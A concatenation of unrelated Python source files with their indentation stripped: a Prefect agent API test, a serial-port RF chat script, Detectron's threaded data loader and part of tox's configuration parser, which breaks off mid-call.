port = sock.getsockname()[1]
agent = TestAgent(agent_address=f"http://127.0.0.1:{port}", max_polls=1)
agent.setup()
# May take a sec for the api server to startup
for attempt in range(5):
try:
resp = requests.get(f"http://127.0.0.1:{port}/api/health")
break
except Exception:
time.sleep(0.1)
else:
agent.cleanup()
assert False, "Failed to connect to health check"
assert resp.status_code == 200
agent.cleanup()
assert not agent._api_server_thread.is_alive()
def test_agent_poke_api(monkeypatch, runner_token, cloud_api):
import threading
requests = pytest.importorskip("requests")
def _poke_agent(agent_address):
# May take a sec for the api server to startup
for attempt in range(5):
try:
resp = requests.get(f"{agent_address}/api/health")
break
except Exception:
time.sleep(0.1)
else:
assert False, "Failed to connect to health check"
assert resp.status_code == 200
# Agent API is now available. Poke agent to start processing.
requests.get(f"{agent_address}/api/poke")
agent_process = MagicMock()
monkeypatch.setattr("prefect.agent.agent.Agent.agent_process", agent_process)
agent_connect = MagicMock(return_value="id")
monkeypatch.setattr("prefect.agent.agent.Agent.agent_connect", agent_connect)
heartbeat = MagicMock()
monkeypatch.setattr("prefect.agent.agent.Agent.heartbeat", heartbeat)
with socket.socket() as sock:
sock.bind(("", 0))
port = sock.getsockname()[1]
agent_address = f"http://127.0.0.1:{port}"
# Poke agent in separate thread as main thread is blocked by main agent
# process waiting for loop interval to complete.
poke_agent_thread = threading.Thread(target=_poke_agent, args=(agent_address,))
poke_agent_thread.start()
agent_start_time = time.time()
agent = Agent(agent_address=agent_address, max_polls=1)
# Override loop interval to 5 seconds.
agent.start(_loop_intervals={0: 5.0})
agent_stop_time = time.time()
agent.cleanup()
assert agent_stop_time - agent_start_time < 5.0
assert not agent._api_server_thread.is_alive()
assert heartbeat.call_count == 1
assert agent_process.call_count == 1
assert agent_connect.call_count == 1
|
chat.py
|
#!/usr/bin/env python3
# Import libraries we need
import time
import serial
import threading
import sys
# Sets up the serial port for our RF Modules
ser = serial.Serial(
port = '/dev/ttyS0',
baudrate = 9600,
parity = serial.PARITY_NONE,
stopbits = serial.STOPBITS_ONE,
bytesize = serial.EIGHTBITS,
timeout = 1
)
# Creates the global variable needed for later
message = ''
# Function to get and decode the message
def readAndDecode():
global message
x = ser.readline()
while (x.decode() == ''):
x = ser.readline()
message = x.decode()
def send(arg1):
# Transmit your message
print('Transmitting...')
while 1:
s = sys.stdin.readline()
ser.write(s.encode())
time.sleep(0.25)
def recieve(arg1):
global message
print('Recieving...')
while 1:
# Get the decoded message and format it
readAndDecode()
message = message.replace('\n', '')
print(message)
time.sleep(0.25)
# Create and start the threads
sendThread = threading.Thread(name='getAndSave', target=send, args=(1,)).start()
recieveThread = threading.Thread(name='action', target=recieve, args=(1,)).start()
|
loader.py
|
# Copyright (c) Facebook, Inc. and its affiliates.
# All rights reserved.
#
# This source code is licensed under the license found in the
# LICENSE file in the root directory of this source tree.
##############################################################################
"""Detectron data loader. The design is generic and abstracted away from any
details of the minibatch. A minibatch is a dictionary of blob name keys and
their associated numpy (float32 or int32) ndarray values.
Outline of the data loader design:
loader thread\
loader thread \ / GPU 1 enqueue thread -> feed -> EnqueueOp
... -> minibatch queue -> ...
loader thread / \ GPU N enqueue thread -> feed -> EnqueueOp
loader thread/
<---------------------------- CPU -----------------------------|---- GPU ---->
A pool of loader threads construct minibatches that are put onto the shared
minibatch queue. Each GPU has an enqueue thread that pulls a minibatch off the
minibatch queue, feeds the minibatch blobs into the workspace, and then runs
an EnqueueBlobsOp to place the minibatch blobs into the GPU's blobs queue.
During each fprop the first thing the network does is run a DequeueBlobsOp
in order to populate the workspace with the blobs from a queued minibatch.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from collections import deque
from collections import OrderedDict
import logging
import numpy as np
import queue as Queue
import signal
import threading
import time
import uuid
from caffe2.python import core, workspace
from detectron.core.config import cfg
from detectron.roi_data.minibatch import get_minibatch
from detectron.roi_data.minibatch import get_minibatch_blob_names
from detectron.utils.coordinator import coordinated_get
from detectron.utils.coordinator import coordinated_put
from detectron.utils.coordinator import Coordinator
import detectron.utils.c2 as c2_utils
logger = logging.getLogger(__name__)
class RoIDataLoader(object):
def __init__(
self,
roidb,
num_loaders=4,
minibatch_queue_size=64,
blobs_queue_capacity=8
):
self._roidb = roidb
self._lock = threading.Lock()
self._perm = deque(range(len(self._roidb)))
self._cur = 0 # _perm cursor
# The minibatch queue holds prepared training data in host (CPU) memory
# When training with N > 1 GPUs, each element in the minibatch queue
# is actually a partial minibatch which contributes 1 / N of the
# examples to the overall minibatch
self._minibatch_queue = Queue.Queue(maxsize=minibatch_queue_size)
self._blobs_queue_capacity = blobs_queue_capacity
# Random queue name in case one instantiates multple RoIDataLoaders
self._loader_id = uuid.uuid4()
self._blobs_queue_name = 'roi_blobs_queue_{}'.format(self._loader_id)
# Loader threads construct (partial) minibatches and put them on the
# minibatch queue
self._num_loaders = num_loaders
self._num_gpus = cfg.NUM_GPUS
self.coordinator = Coordinator()
self._output_names = get_minibatch_blob_names()
self._shuffle_roidb_inds()
self.create_threads()
def minibatch_loader_thread(self):
"""Load mini-batches and put them onto the mini-batch queue."""
with self.coordinator.stop_on_exception():
while not self.coordinator.should_stop():
blobs = self.get_next_minibatch()
# Blobs must be queued in the order specified by
# self.get_output_names
ordered_blobs = OrderedDict()
for key in self.get_output_names():
assert blobs[key].dtype in (np.int32, np.float32), \
'Blob {} of dtype {} must have dtype of ' \
'np.int32 or np.float32'.format(key, blobs[key].dtype)
ordered_blobs[key] = blobs[key]
coordinated_put(
self.coordinator, self._minibatch_queue, ordered_blobs
)
logger.info('Stopping mini-batch loading thread')
def enqueue_blobs_thread(self, gpu_id, blob_names):
"""Transfer mini-batches from a mini-batch queue to a BlobsQueue."""
with self.coordinator.stop_on_exception():
while not self.coordinator.should_stop():
if self._minibatch_queue.qsize == 0:
logger.warning('Mini-batch queue is empty')
blobs = coordinated_get(self.coordinator, self._minibatch_queue)
self.enqueue_blobs(gpu_id, blob_names, blobs.values())
logger.debug(
'batch queue size {}'.format(self._minibatch_queue.qsize())
)
logger.info('Stopping enqueue thread')
def get_next_minibatch(self):
"""Return the blobs to be used for the next minibatch. Thread safe."""
valid = False
while not valid:
db_inds = self._get_next_minibatch_inds()
minibatch_db = [self._roidb[i] for i in db_inds]
blobs, valid = get_minibatch(minibatch_db)
return blobs
def _shuffle_roidb_inds(self):
"""Randomly permute the training roidb. Not thread safe."""
if cfg.TRAIN.ASPECT_GROUPING:
widths = np.array([r['width'] for r in self._roidb])
heights = np.array([r['height'] for r in self._roidb])
horz = (widths >= heights)
vert = np.logical_not(horz)
horz_inds = np.where(horz)[0]
vert_inds = np.where(vert)[0]
horz_inds = np.random.permutation(horz_inds)
vert_inds = np.random.permutation(vert_inds)
mb = cfg.TRAIN.IMS_PER_BATCH
horz_inds = horz_inds[:(len(horz_inds) // mb) * mb]
vert_inds = vert_inds[:(len(vert_inds) // mb) * mb]
inds = np.hstack((horz_inds, vert_inds))
inds = np.reshape(inds, (-1, mb))
row_perm = np.random.permutation(np.arange(inds.shape[0]))
inds = np.reshape(inds[row_perm, :], (-1, ))
self._perm = inds
else:
self._perm = np.random.permutation(np.arange(len(self._roidb)))
self._perm = deque(self._perm)
self._cur = 0
def _get_next_minibatch_inds(self):
"""Return the roidb indices for the next minibatch. Thread safe."""
with self._lock:
# We use a deque and always take the *first* IMS_PER_BATCH items
# followed by *rotating* the deque so that we see fresh items
# each time. If the length of _perm is not divisible by
# IMS_PER_BATCH, then we end up wrapping around the permutation.
db_inds = [self._perm[i] for i in range(cfg.TRAIN.IMS_PER_BATCH)]
self._perm.rotate(-cfg.TRAIN.IMS_PER_BATCH)
self._cur += cfg.TRAIN.IMS_PER_BATCH
if self._cur >= len(self._perm):
self._shuffle_roidb_inds()
return db_inds
def get_output_names(self):
return self._output_names
def enqueue_blobs(self, gpu_id, blob_names, blobs):
"""Put a mini-batch on a BlobsQueue."""
assert len(blob_names) == len(blobs)
t = time.time()
dev = c2_utils.CudaDevice(gpu_id)
queue_name = 'gpu_{}/{}'.format(gpu_id, self._blobs_queue_name)
blob_names = ['gpu_{}/{}'.format(gpu_id, b) for b in blob_names]
for (blob_name, blob) in zip(blob_names, blobs):
workspace.FeedBlob(blob_name, blob, device_option=dev)
logger.debug(
'enqueue_blobs {}: workspace.FeedBlob: {}'.
format(gpu_id, time.time() - t)
)
t = time.time()
op = core.CreateOperator(
'SafeEnqueueBlobs', [queue_name] + blob_names,
blob_names + [queue_name + '_enqueue_status'],
device_option=dev
)
workspace.RunOperatorOnce(op)
logger.debug(
'enqueue_blobs {}: workspace.RunOperatorOnce: {}'.
format(gpu_id, time.time() - t)
)
def create_threads(self):
# Create mini-batch loader threads, each of which builds mini-batches
# and places them into a queue in CPU memory
self._workers = [
threading.Thread(target=self.minibatch_loader_thread)
for _ in range(self._num_loaders)
]
# Create one BlobsQueue per GPU
# (enqueue_blob_names are unscoped)
enqueue_blob_names = self.create_blobs_queues()
# Create one enqueuer thread per GPU
self._enqueuers = [
threading.Thread(
target=self.enqueue_blobs_thread,
args=(gpu_id, enqueue_blob_names)
) for gpu_id in range(self._num_gpus)
]
def start(self, prefill=False):
for w in self._workers + self._enqueuers:
w.start()
if prefill:
logger.info('Pre-filling mini-batch queue...')
while not self._minibatch_queue.full():
logger.info(
' [{:d}/{:d}]'.format(
self._minibatch_queue.qsize(),
self._minibatch_queue.maxsize
)
)
time.sleep(0.1)
# Detect failure and shutdown
if self.coordinator.should_stop():
self.shutdown()
break
def shutdown(self):
self.coordinator.request_stop()
self.coordinator.wait_for_stop()
self.close_blobs_queues()
for w in self._workers + self._enqueuers:
w.join()
def create_blobs_queues(self):
"""Create one BlobsQueue for each GPU to hold mini-batches."""
for gpu_id in range(self._num_gpus):
with c2_utils.GpuNameScope(gpu_id):
workspace.RunOperatorOnce(
core.CreateOperator(
'CreateBlobsQueue', [], [self._blobs_queue_name],
num_blobs=len(self.get_output_names()),
capacity=self._blobs_queue_capacity
)
)
return self.create_enqueue_blobs()
def close_blobs_queues(self):
"""Close a BlobsQueue."""
for gpu_id in range(self._num_gpus):
with core.NameScope('gpu_{}'.format(gpu_id)):
workspace.RunOperatorOnce(
core.CreateOperator(
'CloseBlobsQueue', [self._blobs_queue_name], []
)
)
def create_enqueue_blobs(self):
blob_names = self.get_output_names()
enqueue_blob_names = [
'{}_enqueue_{}'.format(b, self._loader_id) for b in blob_names
]
for gpu_id in range(self._num_gpus):
with c2_utils.NamedCudaScope(gpu_id):
for blob in enqueue_blob_names:
workspace.CreateBlob(core.ScopedName(blob))
return enqueue_blob_names
def register_sigint_handler(self):
def signal_handler(signal, frame):
logger.info(
'SIGINT: Shutting down RoIDataLoader threads and exiting...'
)
self.shutdown()
signal.signal(signal.SIGINT, signal_handler)
|
__init__.py
|
from __future__ import print_function
import argparse
import itertools
import os
import random
import re
import shlex
import string
import sys
import traceback
import warnings
from collections import OrderedDict
from fnmatch import fnmatchcase
from subprocess import list2cmdline
from threading import Thread
import pluggy
import py
import toml
from packaging import requirements
from packaging.utils import canonicalize_name
import tox
from tox.constants import INFO
from tox.exception import MissingDependency
from tox.interpreters import Interpreters, NoInterpreterInfo
from tox.reporter import (
REPORTER_TIMESTAMP_ON_ENV,
error,
update_default_reporter,
using,
verbosity1,
)
from tox.util.path import ensure_empty_dir
from tox.util.stdlib import importlib_metadata
from .parallel import ENV_VAR_KEY_PRIVATE as PARALLEL_ENV_VAR_KEY_PRIVATE
from .parallel import ENV_VAR_KEY_PUBLIC as PARALLEL_ENV_VAR_KEY_PUBLIC
from .parallel import add_parallel_config, add_parallel_flags
from .reporter import add_verbosity_commands
try:
from shlex import quote as shlex_quote
except ImportError:
from pipes import quote as shlex_quote
hookimpl = tox.hookimpl
# DEPRECATED - REMOVE - left for compatibility with plugins importing from here.
# Import hookimpl directly from tox instead.
WITHIN_PROVISION = os.environ.get(str("TOX_PROVISION")) == "1"
SUICIDE_TIMEOUT = 0.0
INTERRUPT_TIMEOUT = 0.3
TERMINATE_TIMEOUT = 0.2
def get_plugin_manager(plugins=()):
# initialize plugin manager
import tox.venv
pm = pluggy.PluginManager("tox")
pm.add_hookspecs(tox.hookspecs)
pm.register(tox.config)
pm.register(tox.interpreters)
pm.register(tox.venv)
pm.register(tox.session)
from tox import package
pm.register(package)
pm.load_setuptools_entrypoints("tox")
for plugin in plugins:
pm.register(plugin)
pm.check_pending()
return pm
class Parser:
"""Command line and ini-parser control object."""
def __init__(self):
class HelpFormatter(argparse.ArgumentDefaultsHelpFormatter):
def __init__(self, prog):
super(HelpFormatter, self).__init__(prog, max_help_position=35, width=190)
self.argparser = argparse.ArgumentParser(
description="tox options", add_help=False, prog="tox", formatter_class=HelpFormatter,
)
self._testenv_attr = []
def add_argument(self, *args, **kwargs):
""" add argument to command line parser. This takes the
same arguments that ``argparse.ArgumentParser.add_argument``.
"""
return self.argparser.add_argument(*args, **kwargs)
def add_testenv_attribute(self, name, type, help, default=None, postprocess=None):
""" add an ini-file variable for "testenv" section.
Types are specified as strings like "bool", "line-list", "string", "argv", "path",
"argvlist".
The ``postprocess`` function will be called for each testenv
like ``postprocess(testenv_config=testenv_config, value=value)``
where ``value`` is the value as read from the ini (or the default value)
and ``testenv_config`` is a :py:class:`tox.config.TestenvConfig` instance
which will receive all ini-variables as object attributes.
Any postprocess function must return a value which will then be set
as the final value in the testenv section.
"""
self._testenv_attr.append(VenvAttribute(name, type, default, help, postprocess))
def add_testenv_attribute_obj(self, obj):
""" add an ini-file variable as an object.
This works as the ``add_testenv_attribute`` function but expects
"name", "type", "help", and "postprocess" attributes on the object.
"""
assert hasattr(obj, "name")
assert hasattr(obj, "type")
assert hasattr(obj, "help")
assert hasattr(obj, "postprocess")
self._testenv_attr.append(obj)
def parse_cli(self, args, strict=False):
args, argv = self.argparser.parse_known_args(args)
if argv and (strict or WITHIN_PROVISION):
self.argparser.error("unrecognized arguments: {}".format(" ".join(argv)))
return args
def _format_help(self):
return self.argparser.format_help()
class VenvAttribute:
def __init__(self, name, type, default, help, postprocess):
self.name = name
self.type = type
self.default = default
self.help = help
self.postprocess = postprocess
class DepOption:
name = "deps"
type = "line-list"
help = "each line specifies a dependency in pip/setuptools format."
default = ()
def postprocess(self, testenv_config, value):
deps = []
config = testenv_config.config
for depline in value:
m = re.match(r":(\w+):\s*(\S+)", depline)
if m:
iname, name = m.groups()
ixserver = config.indexserver[iname]
else:
name = depline.strip()
ixserver = None
# we need to process options, in case they contain a space,
# as the subprocess call to pip install will otherwise fail.
# in case of a short option, we remove the space
for option in tox.PIP.INSTALL_SHORT_OPTIONS_ARGUMENT:
if name.startswith(option):
name = "{}{}".format(option, name[len(option) :].strip())
# in case of a long option, we add an equal sign
for option in tox.PIP.INSTALL_LONG_OPTIONS_ARGUMENT:
name_start = "{} ".format(option)
if name.startswith(name_start):
name = "{}={}".format(option, name[len(option) :].strip())
name = self._cut_off_dep_comment(name)
name = self._replace_forced_dep(name, config)
deps.append(DepConfig(name, ixserver))
return deps
def _replace_forced_dep(self, name, config):
"""Override given dependency config name. Take ``--force-dep-version`` option into account.
:param name: dep config, for example ["pkg==1.0", "other==2.0"].
:param config: ``Config`` instance
:return: the new dependency that should be used for virtual environments
"""
if not config.option.force_dep:
return name
for forced_dep in config.option.force_dep:
if self._is_same_dep(forced_dep, name):
return forced_dep
return name
@staticmethod
def _cut_off_dep_comment(name):
return re.sub(r"\s+#.*", "", name).strip()
@classmethod
def _is_same_dep(cls, dep1, dep2):
"""Definitions are the same if they refer to the same package, even if versions differ."""
dep1_name = canonicalize_name(requirements.Requirement(dep1).name)
try:
dep2_name = canonicalize_name(requirements.Requirement(dep2).name)
except requirements.InvalidRequirement:
# we couldn't parse a version, probably a URL
return False
return dep1_name == dep2_name
class PosargsOption:
name = "args_are_paths"
type = "bool"
default = True
help = "treat positional args in commands as paths"
def postprocess(self, testenv_config, value):
config = testenv_config.config
args = config.option.args
if args:
if value:
args = []
for arg in config.option.args:
if arg and not os.path.isabs(arg):
origpath = os.path.join(config.invocationcwd.strpath, arg)
if os.path.exists(origpath):
arg = os.path.relpath(origpath, testenv_config.changedir.strpath)
args.append(arg)
testenv_config._reader.addsubstitutions(args)
return value
class InstallcmdOption:
name = "install_command"
type = "argv"
default = "python -m pip install {opts} {packages}"
help = "install command for dependencies and package under test."
def postprocess(self, testenv_config, value):
if "{packages}" not in value:
raise tox.exception.ConfigError(
"'install_command' must contain '{packages}' substitution",
)
return value
def parseconfig(args, plugins=()):
"""Parse the configuration file and create a Config object.
:param plugins:
:param list[str] args: list of arguments.
:rtype: :class:`Config`
:raise SystemExit: toxinit file is not found
"""
pm = get_plugin_manager(plugins)
config, option = parse_cli(args, pm)
update_default_reporter(config.option.quiet_level, config.option.verbose_level)
for config_file in propose_configs(option.configfile):
config_type = config_file.basename
content = None
if config_type == "pyproject.toml":
toml_content = get_py_project_toml(config_file)
try:
content = toml_content["tool"]["tox"]["legacy_tox_ini"]
except KeyError:
continue
ParseIni(config, config_file, content)
pm.hook.tox_configure(config=config) # post process config object
break
else:
parser = Parser()
pm.hook.tox_addoption(parser=parser)
# if no tox config file, now we need do a strict argument evaluation
# raise on unknown args
parser.parse_cli(args, strict=True)
if option.help or option.helpini:
return config
msg = "tox config file (either {}) not found"
candidates = ", ".join(INFO.CONFIG_CANDIDATES)
feedback(msg.format(candidates), sysexit=not (option.help or option.helpini))
return config
def get_py_project_toml(path):
with open(str(path)) as file_handler:
config_data = toml.load(file_handler)
return config_data
def propose_configs(cli_config_file):
from_folder = py.path.local()
if cli_config_file is not None:
if os.path.isfile(cli_config_file):
yield py.path.local(cli_config_file)
return
if os.path.isdir(cli_config_file):
from_folder = py.path.local(cli_config_file)
else:
print(
"ERROR: {} is neither file or directory".format(cli_config_file), file=sys.stderr,
)
return
for basename in INFO.CONFIG_CANDIDATES:
if from_folder.join(basename).isfile():
yield from_folder.join(basename)
for path in from_folder.parts(reverse=True):
ini_path = path.join(basename)
if ini_path.check():
yield ini_path
def parse_cli(args, pm):
parser = Parser()
pm.hook.tox_addoption(parser=parser)
option = parser.parse_cli(args)
if option.version:
print(get_version_info(pm))
raise SystemExit(0)
interpreters = Interpreters(hook=pm.hook)
config = Config(
pluginmanager=pm, option=option, interpreters=interpreters, parser=parser, args=args,
)
return config, option
def feedback(msg, sysexit=False):
print("ERROR: {}".format(msg), file=sys.stderr)
if sysexit:
raise SystemExit(1)
def get_version_info(pm):
out = ["{} imported from {}".format(tox.__version__, tox.__file__)]
plugin_dist_info = pm.list_plugin_distinfo()
if plugin_dist_info:
out.append("registered plugins:")
for mod, egg_info in plugin_dist_info:
source = getattr(mod, "__file__", repr(mod))
out.append(" {}-{} at {}".format(egg_info.project_name, egg_info.version, source))
return "\n".join(out)
class SetenvDict(object):
_DUMMY = object()
def __init__(self, definitions, reader):
self.definitions = definitions
self.reader = reader
self.resolved = {}
self._lookupstack = []
def __repr__(self):
return "{}: {}".format(self.__class__.__name__, self.definitions)
def __contains__(self, name):
return name in self.definitions
def get(self, name, default=None):
try:
return self.resolved[name]
except KeyError:
try:
if name in self._lookupstack:
raise KeyError(name)
val = self.definitions[name]
except KeyError:
return os.environ.get(name, default)
self._lookupstack.append(name)
try:
self.resolved[name] = res = self.reader._replace(val)
finally:
self._lookupstack.pop()
return res
def __getitem__(self, name):
x = self.get(name, self._DUMMY)
if x is self._DUMMY:
raise KeyError(name)
return x
def keys(self):
return self.definitions.keys()
def __setitem__(self, name, value):
self.definitions[name] = value
self.resolved[name] = value
@tox.hookimpl
def tox_addoption(parser):
parser.add_argument(
"--version", action="store_true", help="report version information to stdout.",
)
parser.add_argument("-h", "--help", action="store_true", help="show help about options")
parser.add_argument(
"--help-ini",
"--hi",
action="store_true",
dest="helpini",
help="show help about ini-names",
)
add_verbosity_commands(parser)
parser.add_argument(
"--showconfig",
action="store_true",
help="show live configuration (by default all env, with -l only default targets,"
" specific via TOXENV/-e)",
)
parser.add_argument(
"-l",
"--listenvs",
action="store_true",
help="show list of test environments (with description if verbose)",
)
parser.add_argument(
"-a",
"--listenvs-all",
action="store_true",
help="show list of all defined environments (with description if verbose)",
)
parser.add_argument(
"-c", dest="configfile", help="config file name or directory with 'tox.ini' file.",
)
parser.add_argument(
"-e",
action="append",
dest="env",
metavar="envlist",
help="work against specified environments (ALL selects all).",
)
parser.add_argument(
"--devenv",
metavar="ENVDIR",
help=(
"sets up a development environment at ENVDIR based on the env's tox "
"configuration specified by `-e` (-e defaults to py)."
),
)
parser.add_argument("--notest", action="store_true", help="skip invoking test commands.")
parser.add_argument(
"--sdistonly", action="store_true", help="only perform the sdist packaging activity.",
)
add_parallel_flags(parser)
parser.add_argument(
"--parallel--safe-build",
action="store_true",
dest="parallel_safe_build",
help="(deprecated) ensure two tox builds can run in parallel "
"(uses a lock file in the tox workdir with .lock extension)",
)
parser.add_argument(
"--installpkg",
metavar="PATH",
help="use specified package for installation into venv, instead of creating an sdist.",
)
parser.add_argument(
"--develop",
action="store_true",
help="install package in the venv using 'setup.py develop' via 'pip -e .'",
)
parser.add_argument(
"-i",
"--index-url",
action="append",
dest="indexurl",
metavar="URL",
help="set indexserver url (if URL is of form name=url set the "
"url for the 'name' indexserver, specifically)",
)
parser.add_argument(
"--pre",
action="store_true",
help="install pre-releases and development versions of dependencies. "
"This will pass the --pre option to install_command "
"(pip by default).",
)
parser.add_argument(
"-r", "--recreate", action="store_true", help="force recreation of virtual environments",
)
parser.add_argument(
"--result-json",
dest="resultjson",
metavar="PATH",
help="write a json file with detailed information "
"about all commands and results involved.",
)
parser.add_argument(
"--discover",
dest="discover",
nargs="+",
metavar="PATH",
help="for python discovery first try the python executables under these paths",
default=[],
)
# We choose 1 to 4294967295 because it is the range of PYTHONHASHSEED.
parser.add_argument(
"--hashseed",
metavar="SEED",
help="set PYTHONHASHSEED to SEED before running commands. "
"Defaults to a random integer in the range [1, 4294967295] "
"([1, 1024] on Windows). "
"Passing 'noset' suppresses this behavior.",
)
parser.add_argument(
"--force-dep",
action="append",
metavar="REQ",
help="Forces a certain version of one of the dependencies "
"when configuring the virtual environment. REQ Examples "
"'pytest<2.7' or 'django>=1.6'.",
)
parser.add_argument(
"--sitepackages",
action="store_true",
help="override sitepackages setting to True in all envs",
)
parser.add_argument(
"--alwayscopy",
action="store_true",
help="override alwayscopy setting to True in all envs",
)
cli_skip_missing_interpreter(parser)
parser.add_argument("--workdir", metavar="PATH", help="tox working directory")
parser.add_argument(
"args",
nargs="*",
help="additional arguments available to command positional substitution",
)
def _set_envdir_from_devenv(testenv_config, value):
if testenv_config.config.option.devenv is not None:
return py.path.local(testenv_config.config.option.devenv)
else:
return value
parser.add_testenv_attribute(
name="envdir",
type="path",
default="{toxworkdir}/{envname}",
help="set venv directory -- be very careful when changing this as tox "
"will remove this directory when recreating an environment",
postprocess=_set_envdir_from_devenv,
)
# add various core venv interpreter attributes
def setenv(testenv_config, value):
setenv = value
config = testenv_config.config
if "PYTHONHASHSEED" not in setenv and config.hashseed is not None:
setenv["PYTHONHASHSEED"] = config.hashseed
setenv["TOX_ENV_NAME"] = str(testenv_config.envname)
setenv["TOX_ENV_DIR"] = str(testenv_config.envdir)
return setenv
parser.add_testenv_attribute(
name="setenv",
type="dict_setenv",
postprocess=setenv,
help="list of X=Y lines with environment variable settings",
)
def basepython_default(testenv_config, value):
"""either user set or proposed from the factor name
in both cases we check that the factor name implied python version and the resolved
python interpreter version match up; if they don't we warn, unless ignore base
python conflict is set in which case the factor name implied version if forced
"""
for factor in testenv_config.factors:
match = tox.PYTHON.PY_FACTORS_RE.match(factor)
if match:
base_exe = {"py": "python"}.get(match.group(1), match.group(1))
version_s = match.group(2)
if not version_s:
version_info = ()
elif len(version_s) == 1:
version_info = (version_s,)
else:
version_info = (version_s[0], version_s[1:])
implied_version = ".".join(version_info)
implied_python = "{}{}".format(base_exe, implied_version)
break
else:
implied_python, version_info, implied_version = None, (), ""
if testenv_config.config.ignore_basepython_conflict and implied_python is not None:
return implied_python
proposed_python = (implied_python or sys.executable) if value is None else str(value)
if implied_python is not None and implied_python != proposed_python:
testenv_config.basepython = proposed_python
python_info_for_proposed = testenv_config.python_info
if not isinstance(python_info_for_proposed, NoInterpreterInfo):
proposed_version = ".".join(
str(x) for x in python_info_for_proposed.version_info[: len(version_info)]
)
if proposed_version != implied_version:
# TODO(stephenfin): Raise an exception here in tox 4.0
warnings.warn(
"conflicting basepython version (set {}, should be {}) for env '{}';"
"resolve conflict or set ignore_basepython_conflict".format(
proposed_version, implied_version, testenv_config.envname,
),
)
return proposed_python
parser.add_testenv_attribute(
name="basepython",
type="basepython",
default=None,
postprocess=basepython_default,
help="executable name or path of interpreter used to create a virtual test environment.",
)
def merge_description(testenv_config, value):
"""the reader by default joins generated description with new line,
replace new line with space"""
return value.replace("\n", " ")
parser.add_testenv_attribute(
name="description",
type="string",
default="",
postprocess=merge_description,
help="short description of this environment",
)
parser.add_testenv_attribute(
name="envtmpdir", type="path", default="{envdir}/tmp", help="venv temporary directory",
)
parser.add_testenv_attribute(
name="envlogdir", type="path", default="{envdir}/log", help="venv log directory",
)
parser.add_testenv_attribute(
name="downloadcache",
type="string",
default=None,
help="(ignored) has no effect anymore, pip-8 uses local caching by default",
)
parser.add_testenv_attribute(
name="changedir",
type="path",
default="{toxinidir}",
help="directory to change to when running commands",
)
parser.add_testenv_attribute_obj(PosargsOption())
parser.add_testenv_attribute(
name="skip_install",
type="bool",
default=False,
help="Do not install the current package. This can be used when you need the virtualenv "
"management but do not want to install the current package",
)
parser.add_testenv_attribute(
name="ignore_errors",
type="bool",
default=False,
help="if set to True all commands will be executed irrespective of their result error "
"status.",
)
def recreate(testenv_config, value):
if testenv_config.config.option.recreate:
return True
return value
parser.add_testenv_attribute(
name="recreate",
type="bool",
default=False,
postprocess=recreate,
help="always recreate this test environment.",
)
def passenv(testenv_config, value):
# Flatten the list to deal with space-separated values.
value = list(itertools.chain.from_iterable([x.split(" ") for x in value]))
passenv = {
"CURL_CA_BUNDLE",
"LANG",
"LANGUAGE",
"LD_LIBRARY_PATH",
"PATH",
"PIP_INDEX_URL",
"PIP_EXTRA_INDEX_URL",
"REQUESTS_CA_BUNDLE",
"SSL_CERT_FILE",
"TOX_WORK_DIR",
"HTTP_PROXY",
"HTTPS_PROXY",
"NO_PROXY",
str(REPORTER_TIMESTAMP_ON_ENV),
str(PARALLEL_ENV_VAR_KEY_PUBLIC),
}
# read in global passenv settings
p = os.environ.get("TOX_TESTENV_PASSENV", None)
if p is not None:
env_values = [x for x in p.split() if x]
value.extend(env_values)
# we ensure that tmp directory settings are passed on
# we could also set it to the per-venv "envtmpdir"
# but this leads to very long paths when run with jenkins
# so we just pass it on by default for now.
if tox.INFO.IS_WIN:
passenv.add("SYSTEMDRIVE") # needed for pip6
passenv.add("SYSTEMROOT") # needed for python's crypto module
passenv.add("PATHEXT") # needed for discovering executables
passenv.add("COMSPEC") # needed for distutils cygwincompiler
passenv.add("TEMP")
passenv.add("TMP")
# for `multiprocessing.cpu_count()` on Windows (prior to Python 3.4).
passenv.add("NUMBER_OF_PROCESSORS")
passenv.add("PROCESSOR_ARCHITECTURE") # platform.machine()
passenv.add("USERPROFILE") # needed for `os.path.expanduser()`
passenv.add("MSYSTEM") # fixes #429
else:
passenv.add("TMPDIR")
for spec in value:
for name in os.environ:
if fnmatchcase(name.upper(), spec.upper()):
passenv.add(name)
return passenv
parser.add_testenv_attribute(
name="passenv",
type="line-list",
postprocess=passenv,
help="environment variables needed during executing test commands (taken from invocation "
"environment). Note that tox always passes through some basic environment variables "
"which are needed for basic functioning of the Python system. See --showconfig for the "
"eventual passenv setting.",
)
parser.add_testenv_attribute(
name="whitelist_externals",
type="line-list",
help="each lines specifies a path or basename for which tox will not warn "
"about it coming from outside the test environment.",
)
parser.add_testenv_attribute(
name="platform",
type="string",
default=".*",
help="regular expression which must match against ``sys.platform``. "
"otherwise testenv will be skipped.",
)
def sitepackages(testenv_config, value):
return testenv_config.config.option.sitepackages or value
def alwayscopy(testenv_config, value):
return testenv_config.config.option.alwayscopy or value
parser.add_testenv_attribute(
name="sitepackages",
type="bool",
default=False,
postprocess=sitepackages,
help="Set to ``True`` if you want to create virtual environments that also "
"have access to globally installed packages.",
)
parser.add_testenv_attribute(
"download",
type="bool",
default=False,
help="download the latest pip, setuptools and wheel when creating the virtual"
"environment (default is to use the one bundled in virtualenv)",
)
parser.add_testenv_attribute(
name="alwayscopy",
type="bool",
default=False,
postprocess=alwayscopy,
help="Set to ``True`` if you want virtualenv to always copy files rather "
"than symlinking.",
)
def pip_pre(testenv_config, value):
return testenv_config.config.option.pre or value
parser.add_testenv_attribute(
name="pip_pre",
type="bool",
default=False,
postprocess=pip_pre,
help="If ``True``, adds ``--pre`` to the ``opts`` passed to the install command. ",
)
def develop(testenv_config, value):
option = testenv_config.config.option
return not option.installpkg and (value or option.develop or option.devenv is not None)
parser.add_testenv_attribute(
name="usedevelop",
type="bool",
postprocess=develop,
default=False,
help="install package in develop/editable mode",
)
parser.add_testenv_attribute_obj(InstallcmdOption())
parser.add_testenv_attribute(
name="list_dependencies_command",
type="argv",
default="python -m pip freeze",
help="list dependencies for a virtual environment",
)
parser.add_testenv_attribute_obj(DepOption())
parser.add_testenv_attribute(
name="suicide_timeout",
type="float",
default=SUICIDE_TIMEOUT,
help="timeout to allow process to exit before sending SIGINT",
)
parser.add_testenv_attribute(
name="interrupt_timeout",
type="float",
default=INTERRUPT_TIMEOUT,
help="timeout before sending SIGTERM after SIGINT",
)
parser.add_testenv_attribute(
name="terminate_timeout",
type="float",
default=TERMINATE_TIMEOUT,
help="timeout before sending SIGKILL after SIGTERM",
)
parser.add_testenv_attribute(
